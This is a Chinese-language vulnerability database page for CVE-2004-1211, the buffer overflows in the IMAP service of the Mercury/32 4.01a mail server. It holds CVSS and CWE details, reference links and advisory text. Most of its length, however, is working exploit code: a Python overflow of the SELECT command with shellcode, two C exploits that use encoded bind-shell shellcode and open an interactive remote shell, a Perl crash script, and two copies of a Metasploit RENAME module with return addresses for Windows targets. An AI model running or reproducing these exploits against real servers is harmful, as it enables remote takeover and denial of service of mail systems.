CVE-2004-1211
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:52:28
NMCOEPS    

[原文]Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via long arguments to the (1) EXAMINE, (2) SUBSCRIBE, (3) STATUS, (4) APPEND, (5) CHECK, (6) CLOSE, (7) EXPUNGE, (8) FETCH, (9) RENAME, (10) DELETE, (11) LIST, (12) SEARCH, (13) CREATE, or (14) UNSUBSCRIBE commands.


[CNNVD]PegasusMail Mercury/32 IMAP 缓冲区溢出漏洞(CNNVD-200501-130)

        Mercury Mail Transport System是一款邮件传送系统。
        Mercury 4.01a的IMAP服务存在多个缓冲区溢出漏洞。
        远程认证用户可在多个命令中(包括EXAMINE,SUBSCRIBE,STATUS,APPEND,CHECK, CLOSE,EXPUNGE,FETCH,RENAME,DELETE,LIST,SEARCH, CREATE及UNSUBSCRIBE)使用超长的参数,造成溢出,从而导致程序崩溃或执行任意代码,

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1211
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1211
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-130
(官方数据源) CNNVD

- 其它链接及资源

http://home.kabelfoon.nl/~jaabogae/han/m_401b.html
(UNKNOWN)  CONFIRM  http://home.kabelfoon.nl/~jaabogae/han/m_401b.html
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/029701.html
(UNKNOWN)  FULLDISC  20041201 Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003.
http://marc.info/?l=bugtraq&m=110193702909991&w=2
(UNKNOWN)  BUGTRAQ  20041201 Multiple buffer overflows exist in Mercury/32, v4.01a, Dec 8 2003.
http://www.securityfocus.com/bid/11775
(VENDOR_ADVISORY)  BID  11775
http://xforce.iss.net/xforce/xfdb/18318
(VENDOR_ADVISORY)  XF  mercury-command-bo(18318)

- 漏洞信息

PegasusMail Mercury/32 IMAP 缓冲区溢出漏洞
危急 缓冲区溢出
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        Mercury Mail Transport System是一款邮件传送系统。
        Mercury 4.01a的IMAP服务存在多个缓冲区溢出漏洞。
        远程认证用户可在多个命令中(包括EXAMINE,SUBSCRIBE,STATUS,APPEND,CHECK, CLOSE,EXPUNGE,FETCH,RENAME,DELETE,LIST,SEARCH, CREATE及UNSUBSCRIBE)使用超长的参数,造成溢出,从而导致程序崩溃或执行任意代码,

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.pmail.com/downloads_s3_t.htm

- 漏洞信息 (663)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (EDBID:663)
windows remote
2004-11-29 Verified
143 muts
N/A [点击下载]
#########################################################
#                                                       #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow     	#
# Discovered by : Muts                                  #
# Coded by : Muts                                       #
# WWW.WHITEHAT.CO.IL                                    #
# Plain vanilla stack overflow in the SELECT command  	#
#                                                       #
#########################################################


import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Lame calc.exe shellcode - dont expect miracles!

sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"

#Change RET Address as needed
buffer = '\x41'*260 +  struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2

print "\nSending evil buffer..."
s.connect(('192.168.1.167',143))
s.send('a001 LOGIN ftp ftp' + '\r\n')
data = s.recv(1024)
sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "

# milw0rm.com [2004-11-29]
		

- 漏洞信息 (668)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code) (EDBID:668)
windows remote
2004-11-30 Verified
143 JohnH
N/A [点击下载]
/*  whitehat.co.il comments removed do to muts love */

/** Remote Mercury32 Imap exploit
 ** By: JohnH@secnetops.com
 **/

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

#define version         "1.0"
int usage(char *p);


char sc_bind[] =
    //decoder
    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
    "\x05\xE8\xEC\xFF\xFF\xFF"
    //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
    //XOR with 0x96 (267 0x10B bytes)
    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
    //decoder end sign
    "\x45\x59\x34\x53";

int             iType;
int             iPort=143;
char    *ip=NULL;
char    username[256];
char    password[256];

int main(int argc, char **argv)
{
    int             c;


    if(argc < 2)
    {
        usage(argv[0]);
        return 0;
    }


    while((c = getopt(argc, argv, "u:P:h:p:")) != EOF) {
        switch(c) {

        case 'u':
            strncpy(username, optarg, sizeof (username) - 1);
            break;

        case 'P':
            strncpy(password, optarg, sizeof (password) - 1);
            break;

        case 'h':
            ip=optarg;
            break;
        case 'p':
            iPort=atoi(optarg);
            break;
        default:
            usage (argv[0]);
            return 0;
        }
    }


    if((!ip))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return 0;
    }

    SendExploit();
    return 0;
}

/* ripped from TESO code */
void shell (int sock)
{
    int     l;
    char    buf[512];
    fd_set  rfds;


    while (1) {
        FD_SET (0, &rfds);
        FD_SET (sock, &rfds);
        select (sock + 1, &rfds, NULL, NULL, NULL);
        if (FD_ISSET (0, &rfds)) {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("\n - Connection closed by local user\n");
                exit (EXIT_FAILURE);
            }
            write (sock, buf, l);
        }

        if (FD_ISSET (sock, &rfds)) {
            l = read (sock, buf, sizeof (buf));
            if (l == 0) {
                printf ("\n - Connection closed by remote host.\n");
                exit (EXIT_FAILURE);
            } else if (l < 0) {
                printf ("\n - Read failure\n");
                exit (EXIT_FAILURE);
            }
            write (1, buf, l);
        }
    }
}

int     SendExploit()
{
    struct hostent *he;
    struct in_addr in;
    struct sockaddr_in peer;
    int             iErr, s,s2;
    int x;
    char    buffer[9000];
    char    buffer2[9000];
    char    szRecvBuff[0x1000];
    char *ip2=NULL;

    printf( "MERCURY32 Imap exploit\n");
    printf( "By: JohnH@secnetops.com\n");
    printf("[+] Entering God Mode\n");

    // Login
    memset(buffer2,0x0,sizeof(buffer2));
    strcat(buffer2,"a001 LOGIN ");
    strcat(buffer2,username);
    strcat(buffer2," ");
    strcat(buffer2,password);
    strcat(buffer2,"\n");

    bzero  (buffer,sizeof(buffer));
    strcat(buffer,"a001 SELECT ");
    x = strlen(buffer);
    memset(buffer+x,0x41,260);
    x+=260;
    *(unsigned int *)&buffer[x] = 0x01f9c8fa;
    x+=4;
    memset(buffer+x,0x90,100);
    x+=100;
    memcpy (buffer+x, sc_bind, strlen(sc_bind));
    x+=strlen(sc_bind);
    memcpy(buffer+x,"\r\n",2);
    x+=2;


    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(iPort);
    peer.sin_addr.s_addr = inet_addr(ip);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        perror("socket");
        return(0);
    }
    if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)

    {
        perror("connect");
        return(0);
    }
    printf("[+] connect to %s:%d success.\n", ip, iPort);
    sleep(3);

    memset(szRecvBuff, 0, sizeof(szRecvBuff));
    iErr = send(s, buffer2, strlen(buffer2),0);
    printf("[+] Sent: %d\n", iErr);

    iErr = send(s, buffer, x,0);

    printf("[+] Sent: %d\n", iErr);

    printf("[+] Wait for shell.\n");
    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    ip2 = in.s_addr;

    sleep(5);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(1981);
    peer.sin_addr.s_addr = ip2;
    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s2 < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
    {
        perror("connect");
        return(0);
    }
    printf ("[+] We got a shell \n");

    shell(s2);


    return 0;

}

int usage(char *p)
{
    printf("MERCURY32 Imap Remote Exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port>\n",p);
    exit(0);
}

// milw0rm.com [2004-11-30]
		

- 漏洞信息 (670)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow v2 (c code) (EDBID:670)
windows remote
2004-12-01 Verified
143 JohnH
N/A [点击下载]
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
 ** By: JohnH@secnetops.com
 **
 ** Notes: Second public release and both of them are murcury32 ;) 
 **        Again someone posted some dos code :( why bother?
 **        If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not 
 **        change. I did not check the asm but its prob using the same routine for all 14 commands.
 **
 ** Date: 12/01/04
 **/

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

#define version         "1.0"
int usage(char *p);


char sc_bind[] =
    //decoder
    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
    "\x05\xE8\xEC\xFF\xFF\xFF"
    //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
    //XOR with 0x96 (267 0x10B bytes)
    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
    //decoder end sign
    "\x45\x59\x34\x53";

int             type;
int             iPort=143;
char    *ip=NULL;
char    username[256];
char    password[256];

int main(int argc, char **argv)
{
    int             c;


    if(argc < 2)
    {
        usage(argv[0]);
        return 0;
    }


    while((c = getopt(argc, argv, "u:P:h:p:t:")) != EOF) {
        switch(c) {

        case 'u':
            strncpy(username, optarg, sizeof (username) - 1);
            break;

        case 'P':
            strncpy(password, optarg, sizeof (password) - 1);
            break;

        case 'h':
            ip=optarg;
            break;
        case 'p':
            iPort=atoi(optarg);
            break;
        case 't':
	    type=atoi(optarg);
	    break;
	default:
            usage (argv[0]);
            return 0;
        }
    }


    if((!ip))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return 0;
    }

    SendExploit();
    return 0;
}

/* ripped from TESO code */
void shell (int sock)
{
    int     l;
    char    buf[512];
    fd_set  rfds;


    while (1) {
        FD_SET (0, &rfds);
        FD_SET (sock, &rfds);
        select (sock + 1, &rfds, NULL, NULL, NULL);
        if (FD_ISSET (0, &rfds)) {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("\n - Connection closed by local user\n");
                exit (EXIT_FAILURE);
            }
            write (sock, buf, l);
        }

        if (FD_ISSET (sock, &rfds)) {
            l = read (sock, buf, sizeof (buf));
            if (l == 0) {
                printf ("\n - Connection closed by remote host.\n");
                exit (EXIT_FAILURE);
            } else if (l < 0) {
                printf ("\n - Read failure\n");
                exit (EXIT_FAILURE);
            }
            write (1, buf, l);
        }
    }
}

int     SendExploit()
{
    struct hostent *he;
    struct in_addr in;
    struct sockaddr_in peer;
    int             iErr, s,s2;
    int x;
    char    buffer[9000];
    char    buffer2[9000];
    char    szRecvBuff[0x1000];
    char *ip2=NULL;

    printf( "MERCURY32 Imap exploit\n");
    printf( "By: JohnH@secnetops.com\n");
    printf("[+] Entering God Mode\n");

    // Login
    memset(buffer2,0x0,sizeof(buffer2));
    strcat(buffer2,"a001 LOGIN ");
    strcat(buffer2,username);
    strcat(buffer2," ");
    strcat(buffer2,password);
    strcat(buffer2,"\n");

    bzero  (buffer,sizeof(buffer));
    printf("[+] Using type: %d\n",type);
    if (type == 0)
          strcat(buffer,"a001 EXAMINE ");
    else if(type == 1)
	   strcat(buffer,"a001 SUBSCRIBE ");
    else if(type == 2)
	   strcat(buffer,"a001 STATUS ");
    else if(type == 3)
            strcat(buffer,"a001 APPEND ");
    else if(type == 4)
            strcat(buffer,"a001 CHECK ");
    else if(type == 5)
            strcat(buffer,"a001 CLOSE ");
    else if(type == 6)
            strcat(buffer,"a001 EXPUNGE ");
    else if(type == 7)
            strcat(buffer,"a001 FETCH ");
    else if(type == 8)
            strcat(buffer,"a001 RENAME ");
    else if(type == 9)
            strcat(buffer,"a001 DELETE ");
    else if(type == 10)
            strcat(buffer,"a001 LIST ");
    else if(type == 11)
            strcat(buffer,"a001 SEARCH ");
    else if(type == 12)
	    strcat(buffer,"a001 CREATE ");
    else if(type == 13)
            strcat(buffer,"a001 UNSUBSCRIBE ");
    else if(type == 14)
	    strcat(buffer,"a001 SELECT ");



    x = strlen(buffer);
    memset(buffer+x,0x41,260);
    x+=260;
    *(unsigned int *)&buffer[x] = 0x01f9c8fa;
    x+=4;
    memset(buffer+x,0x90,100);
    x+=100;
    memcpy (buffer+x, sc_bind, strlen(sc_bind));
    x+=strlen(sc_bind);
    memcpy(buffer+x,"\r\n",2);
    x+=2;


    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(iPort);
    peer.sin_addr.s_addr = inet_addr(ip);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        perror("socket");
        return(0);
    }
    if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)

    {
        perror("connect");
        return(0);
    }
    printf("[+] connect to %s:%d success.\n", ip, iPort);
    sleep(3);

    memset(szRecvBuff, 0, sizeof(szRecvBuff));
    iErr = send(s, buffer2, strlen(buffer2),0);
    printf("[+] Sent: %d\n", iErr);

    iErr = send(s, buffer, x,0);

    printf("[+] Sent: %d\n", iErr);

    printf("[+] Wait for shell.\n");
    if (!(he = gethostbyname(ip)))
    {
        herror("Resolving host");
        exit(EXIT_FAILURE);
    }
    in.s_addr = *((unsigned int *)he->h_addr);
    ip2 = in.s_addr;

    sleep(5);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(1981);
    peer.sin_addr.s_addr = ip2;
    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s2 < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
    {
        perror("connect");
        return(0);
    }
    printf ("[+] We got a shell \n");

    shell(s2);


    return 0;

}

int usage(char *p)
{
    printf("MERCURY32 Imap Remote Exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\n",p);
    printf("Possible types: Look in source code too lazy to type out 14 types\n");
    exit(0);
}

// milw0rm.com [2004-12-01]
		

- 漏洞信息 (1159)

Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit (EDBID:1159)
windows dos
2004-12-01 Verified
0 Reed Arvin
N/A [点击下载]
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
#        Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

        sleep(1);

        print $socket "0001 CHECK " . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====

# milw0rm.com [2004-12-01]
		

- 漏洞信息 (16484)

Mercury/32 v4.01a IMAP RENAME Buffer Overflow (EDBID:16484)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow vulnerability in the
				Mercury/32 v.4.01a IMAP service.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-1211'],
					[ 'OSVDB', '12508'],
					[ 'BID', '11775'],
					[ 'NSS', '15867'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
					['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
					['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
				],
			'DisclosureDate' => 'Nov 29 2004'))
	end

	def check
		connect
		resp = sock.get_once
		disconnect

		if (resp =~ /Mercury\/32 v4\.01a/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
		sploit << [target.ret].pack('V') + payload.encoded

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83124)

Mercury/32 v4.01a IMAP RENAME Buffer Overflow (PacketStormID:F83124)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
CVE-2004-1211
[点击下载]

This Metasploit module exploits a stack overflow vulnerability in the Mercury/32 v.4.01a IMAP service.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow vulnerability in the
				Mercury/32 v.4.01a IMAP service.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1211'],
					[ 'OSVDB', '12508'],
					[ 'BID', '11775'],
					[ 'NSS', '15867'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x7846107b }],
					['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
					['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
				],
			'DisclosureDate' => 'Nov 29 2004'))
	end

	def check
		connect
		resp = sock.get_once
		disconnect

		if (resp =~ /Mercury\/32 v4\.01a/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		sploit =  "a001 RENAME " + rand_text_alpha_upper(260)
		sploit << [target.ret].pack('V') + payload.encoded 

		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

12508
Mercury Mail Transport System IMAP Server Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in Mercury Mail. The IMAP server fails to validate input passed to the EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, RENAME, DELETE, LIST, SEARCH, CREATE, and UNSUBSCRIBE commands resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-11-29 Unknow
2004-12-01 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, David Harris has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Mercury Mail Multiple Remote IMAP Stack Buffer Overflow Vulnerabilities
Boundary Condition Error 11775
Yes No
2004-11-29 12:00:00 2007-03-26 07:53:00
Muts disclosed this vulnerability. Further disclosure was provided by Reed Arvin <reedarvin@gmail.com>.

- 受影响的程序版本

David Harris Mercury (win32 version) 4.0 1a
David Harris Mercury (win32 version) 4.0 1
David Harris Mercury (win32 version) 4.0 1b

- 不受影响的程序版本

David Harris Mercury (win32 version) 4.0 1b

- 漏洞讨论

Mercury Mail is reported susceptible to multiple stack-based buffer-overflow vulnerabilities in its IMAP server implementation. These issues are due to the application's failure to properly bounds-check user-supplied input before copying it to a finite-sized memory buffer.

Exploiting these vulnerabilities allows authenticated, remote attackers to execute arbitrary machine code in the context of the affected server process.

Versions prior to 4.01a of Mercury Mail are reported affected by these vulnerabilities; other versions may also be affected.

Note: BID 11788 has been consolidated with this BID; they actually represent the same issues.

- 漏洞利用

The following exploits are available:

- 解决方案

The vendor has released version 4.01b to address these issues.


David Harris Mercury (win32 version) 4.0 1

David Harris Mercury (win32 version) 4.0 1a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站